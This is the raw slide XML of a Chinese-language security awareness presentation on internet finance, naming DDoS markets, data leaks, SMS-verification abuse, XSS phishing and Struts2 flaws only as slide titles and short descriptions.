              <a:rPr lang="en-US" altLang="zh-CN" sz="1707" dirty="0"/>
              <a:t>Prince</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1707" dirty="0"/>
              <a:t>说，“好像一个攻击者俱乐部，俱乐部的成员们把所有的工具 都拿出来使用，一个不行换一个，直到有效为止”。 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34785621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8368" y="921296"/>
            <a:ext cx="7643834" cy="657204"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3413" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3413" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>年： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5760" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Goudy Stout" panose="0202090407030B020401" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>453.8G </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5760" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Goudy Stout" panose="0202090407030B020401" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>！！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59" y="2117147"/>
            <a:ext cx="6908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67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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2194561" y="1"/>
            <a:ext cx="7362760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2739" tIns="42739" rIns="42739" bIns="42739" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="801687">
              <a:defRPr sz="3400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4572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zh-CN" sz="3627" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3627" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>黑市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826347"/>
            <a:ext cx="7374467" cy="668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8" y="1905001"/>
            <a:ext cx="7813040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20" y="3200401"/>
            <a:ext cx="6258560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94" y="4544907"/>
            <a:ext cx="6979920" cy="296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8408" y="-95370"/>
            <a:ext cx="8261774" cy="811954"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>随处可见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS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9533" y="1116149"/>
            <a:ext cx="8458201" cy="556429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3" y="966651"/>
            <a:ext cx="8141547" cy="651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8232" y="-90816"/>
            <a:ext cx="8261774" cy="896741"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只要有点钱，谁都能发起攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4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370" y="1099215"/>
            <a:ext cx="3225801" cy="5335694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519" y="1314233"/>
            <a:ext cx="3149600" cy="463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 descr="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02" y="975361"/>
            <a:ext cx="4870131" cy="28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02" y="3184447"/>
            <a:ext cx="5023300" cy="67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 descr="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86" y="3882861"/>
            <a:ext cx="5147733" cy="36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迄今为止，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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全球互联网史上最大的一次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err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DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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攻击是去年底部署在阿里云的某游戏公司，攻击流量峰值达每秒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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453.8Gb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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。目前而言，黑客甚至对攻击进行明码标价，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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打</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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1G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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的流量到一个网站一小时，只需</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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  <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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块钱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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9477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近几年的安全事件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 7" descr="D:\Documents\Desktop\1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5" y="1108510"/>
            <a:ext cx="4608513" cy="209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5596880" y="2015615"/>
            <a:ext cx="350477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CSDN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数据库被泄漏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r="6403"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="420665" y="3743359"/>
            <a:ext cx="4892675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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5596880" y="3812470"/>
            <a:ext cx="3504774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/>
              <a:t>2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>年携程信用卡信息泄露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r="18294" b="83218"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="243705" y="5076393"/>
            <a:ext cx="5246594" cy="96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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5596880" y="5560159"/>
            <a:ext cx="3504774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/>
              <a:t>2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>12306</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>网站信息泄露</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36645864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524872" y="3096"/>
            <a:ext cx="8153423" cy="70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2739" tIns="42739" rIns="42739" bIns="42739" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="801687">
              <a:defRPr sz="3400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4572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3840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>拒绝服务攻击现状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8405"/>
            <a:ext cx="3540642" cy="3593805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184214677"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3220617" y="1641376"/>
          <a:ext cx="6192688" cy="4623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092824" y="0"/>
            <a:ext cx="4836870" cy="70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2739" tIns="42739" rIns="42739" bIns="42739" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="801687">
              <a:defRPr sz="3400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4572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algn="ctr" defTabSz="801687">
              <a:defRPr sz="3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3840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>拒绝服务攻击的发展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886890080"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="789578" y="1249704"/>
          <a:ext cx="7942215" cy="5221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16" y="4233664"/>
            <a:ext cx="2886175" cy="28861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有人说，企业分为两种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知道自己被黑的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不知道自己被黑的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还有人说应该这样分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值得被黑的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不值得被黑的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9019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安全风险：从漏洞说起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27" y="4737720"/>
            <a:ext cx="4069656" cy="12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64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44118"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="700336" y="777050"/>
            <a:ext cx="8762236" cy="1944216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6520" y="2703863"/>
            <a:ext cx="46958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03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360" y="921296"/>
            <a:ext cx="8136904" cy="601380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592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FOCUS主题">
  <a:themeElements>
    <a:clrScheme name="PPT2008">
      <a:dk1>
        <a:srgbClr val="284448"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="47677B"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EFF5F6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="92BCC2"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="CEE1E3"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="B6D2D6"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="EDF4F5"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="DBE9EB"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="EDF4F5"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00B0F0"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="B50D0D"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="PPT2008">
      <a:majorFont>
        <a:latin typeface="Tahoma"/>
        <a:ea typeface="微软雅黑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B73800262A4FA145BD0CA523E8D719A9" ma:contentTypeVersion="1" ma:contentTypeDescription="新建文档。" ma:contentTypeScope="" ma:versionID="3565e779b7037ce77d98dd57353f192f">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="b51e50da1bca0add1c6bbfbefcbaaa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 ma:readOnly="true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69F3D2-9DAF-4AC2-A8EB-48CE3D4A6E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CD5B357-AA76-4155-B536-A6E4D963C16C}">
  <ds:schemaRefs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1CB62D9-C8BD-49CC-AB06-7D77BDDEBC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5278</TotalTime>
  <Words>1138</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>173</Paragraphs>
  <Slides>52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Calibri</vt:lpstr>
      <vt:lpstr>FrutigerNext LT Medium</vt:lpstr>
      <vt:lpstr>Goudy Stout</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>NSFOCUS主题</vt:lpstr>
      <vt:lpstr>乌云笼罩下的互联网金融</vt:lpstr>
      <vt:lpstr>黑客篡改用户账号盗取1600万</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>近几年的安全事件</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>安全风险：从漏洞说起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短信费是怎样用完的？</vt:lpstr>
      <vt:lpstr>短信费是怎样用完的？</vt:lpstr>
      <vt:lpstr>命运多舛的安全功能：短信校验</vt:lpstr>
      <vt:lpstr>安全功能之重灾区：登录功能</vt:lpstr>
      <vt:lpstr>XSS登录框钓鱼示例</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>截止2015年7月25日，已经收集了互联网金融平台漏洞433个</vt:lpstr>
      <vt:lpstr>每个月出现的安全漏洞数量</vt:lpstr>
      <vt:lpstr>高风险漏洞占82%</vt:lpstr>
      <vt:lpstr>漏洞状态</vt:lpstr>
      <vt:lpstr>厂商确认只占40%</vt:lpstr>
      <vt:lpstr>漏洞类型排行</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>开发框架风险：某网贷Struts2远程命令执行</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>通用平台风险</vt:lpstr>
      <vt:lpstr>手机APP</vt:lpstr>
      <vt:lpstr>手机App安全风险点</vt:lpstr>
      <vt:lpstr>安全不是一个网站的事情</vt:lpstr>
      <vt:lpstr>永远不要相信已经安全了</vt:lpstr>
      <vt:lpstr>敏感数据相关风险</vt:lpstr>
      <vt:lpstr>安全不是一个人的事情</vt:lpstr>
      <vt:lpstr>数据泄露案例 之 爆破</vt:lpstr>
      <vt:lpstr>数据泄露案例 之 漏洞</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>研究人员利用42万僵尸节点创建全球IPv4地图 </vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>2014年： 453.8G ！！</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>随处可见的DDOS工具</vt:lpstr>
      <vt:lpstr>只要有点钱，谁都能发起攻击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XXXXXX</dc:title>
  <cp:lastModifiedBy>alpha liu</cp:lastModifiedBy>
  <cp:revision>208</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-07-03T01:53:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-01-10T05:11:29Z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0x010100B73800262A4FA145BD0CA523E8D719A9</vt:lpwstr>
  </property>
</Properties>
</file>